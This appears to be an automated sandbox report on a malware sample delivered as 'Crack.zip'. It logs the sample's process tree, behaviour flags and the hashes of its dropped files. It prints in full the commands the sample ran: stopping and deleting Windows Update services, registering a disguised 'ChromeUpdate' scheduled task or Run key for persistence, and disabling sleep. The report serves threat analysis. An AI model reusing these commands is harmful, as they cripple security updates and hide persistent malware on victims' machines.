C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vieybfx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdate' /tr '''C:\Program Files\ChromeUpdate\Update.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\ChromeUpdate\Update.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ChromeUpdate" /t REG_SZ /f /d 'C:\Program Files\ChromeUpdate\Update.exe' }2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\ChromeUpdate\Update.exe"C:\Program Files\ChromeUpdate\Update.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vieybfx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdate' /tr '''C:\Program Files\ChromeUpdate\Update.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\ChromeUpdate\Update.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ChromeUpdate" /t REG_SZ /f /d 'C:\Program Files\ChromeUpdate\Update.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Program Files\ChromeUpdate\Update.exe
  Filesize: 6.9MB
  MD5: 1631204510e27924774984f84392b3bc
  SHA1: 2244019f2c5b72ca02752db1b92b8d2200379c9b
  SHA256: bc9ce0fd11d995e2cb1ca5f4200d7b95b9bc8718a4beee23a5f5ccbc7388ee52
  SHA512: edc47498a57735d479492832924564819b0cd9af0d54c39936e215b3832d76461433b49d9fd98c1836352d8e0d34cd2c91adf3091b7b8809939556f6e670c5f5
- C:\Program Files\Google\Libs\g.log
  Filesize: 226B
  MD5: fdba80d4081c28c65e32fff246dc46cb
  SHA1: 74f809dedd1fc46a3a63ac9904c80f0b817b3686
  SHA256: b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
  SHA512: b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: d85ba6ff808d9e5444a4b369f5bc2730
  SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\1IYUAPIF\Crack.zip.j6jricw.partial
  Filesize: 6.8MB
  MD5: 485a89a200683be78d78b0452e41c695
  SHA1: a84d44cb8ea8220df7f465bedc06aaa11eb36b0f
  SHA256: 3f74497ab1ef54e7f89296d28ec6d2565465d416ceb6bac1e5034f06cfbe72fb
  SHA512: 1fe942a1dec0997ea32c1f73d0d1dec8217da15a47b18a994158eb6106942f5e4a5cb677239e11263da2a109ae9d2606e4405c54b947eba408a2f2baa4473444

- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YYL8D8JJ\Crack[1].zip
  Filesize: 6.8MB
  MD5: 485a89a200683be78d78b0452e41c695
  SHA1: a84d44cb8ea8220df7f465bedc06aaa11eb36b0f
  SHA256: 3f74497ab1ef54e7f89296d28ec6d2565465d416ceb6bac1e5034f06cfbe72fb
  SHA512: 1fe942a1dec0997ea32c1f73d0d1dec8217da15a47b18a994158eb6106942f5e4a5cb677239e11263da2a109ae9d2606e4405c54b947eba408a2f2baa4473444

- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YYL8D8JJ\suggestions[1].en-US
  Filesize: 17KB
  MD5: 5a34cb996293fde2cb7a4ac89587393a
  SHA1: 3c96c993500690d1a77873cd62bc639b3a10653f
  SHA256: c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
  SHA512: e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: d28a889fd956d5cb3accfbaf1143eb6f
  SHA1: 157ba54b365341f8ff06707d996b3635da8446f7
  SHA256: 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
  SHA512: 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 5eabb81f40bf3b88a1677853699692e6
  SHA1: 9be1b56a66e78113cba88f01c2022ad8a0c5d5ad
  SHA256: fa9918faaf899c4a165d497e183692e13e65fdd140026416ea56af4f218060b0
  SHA512: 7fbef3a6f3056654a21b8d1c7fc9cc11e6a0d2adf100b016422bac65675dab68b8a1f0603bc44043c0c75e28f52f96815b0f33eaa17967f06d838c6ae0299c8f

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 08f9f3eb63ff567d1ee2a25e9bbf18f0
  SHA1: 6bf06056d1bb14c183490caf950e29ac9d73643a
  SHA256: 82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0
  SHA512: 425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 2fd4fb751ae39737c0cc2450461f62c4
  SHA1: ba0358e721e3ff04e4cf9ac79b71279235dae163
  SHA256: 10a352ab229aad09cd67814f467ad99ae64a86fa5ff831b884a98e4a0fb758af
  SHA512: 01df9635c736834f00a7db3913e8ef95395e0681442a22c0a981846ca9f7c58e73aa9fef363fe6577717e3458071bdf31120f484889344754632f58d06fbbbda

- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gonp22l3.lcz.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

- C:\Windows\System32\drivers\etc\hosts
  Filesize: 3KB
  MD5: 00930b40cba79465b7a38ed0449d1449
  SHA1: 4b25a89ee28b20ba162f23772ddaf017669092a5
  SHA256: eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
  SHA512: cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 4KB
  MD5: bdb25c22d14ec917e30faf353826c5de
  SHA1: 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
  SHA256: e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
  SHA512: b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: b42c70c1dbf0d1d477ec86902db9e986
  SHA1: 1d1c0a670748b3d10bee8272e5d67a4fabefd31f
  SHA256: 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
  SHA512: 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5